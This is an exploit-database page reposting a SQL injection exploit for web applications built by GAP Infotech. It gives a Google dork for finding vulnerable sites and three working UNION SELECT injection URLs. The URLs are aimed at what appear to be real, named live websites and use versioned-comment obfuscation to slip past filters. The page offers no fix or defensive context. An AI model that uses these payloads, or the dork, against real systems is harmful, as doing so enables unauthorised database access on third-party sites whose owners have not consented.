Advertisement






GAP Infotech Sql Injection Vulnerability

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-03-21
CPE
cpe:cpe:/a:gap-infotech:application:sql-injection
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030136

Below is a copy:

GAP Infotech Sql Injection Vulnerability
*********************************************************
#Exploit Title: GAP Infotech Sql Injection Vulnerability
#Date: 2021-03-21
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered By: GAP Infotech"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Powered By: GAP Infotech"


### Demo :

http://www.7acres.in/bulder_type.php?id=-81%27%20/*!12345union*/%20select%201,2,3,version()--+

https://www.jascon.in/news.php?id=-30+/*!12345union*/+select+1,2,3,version(),5,6,7--

http://www.bbreindia.com/residential.php?project=-2%20/*!12345UNION*/%20SELECT%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.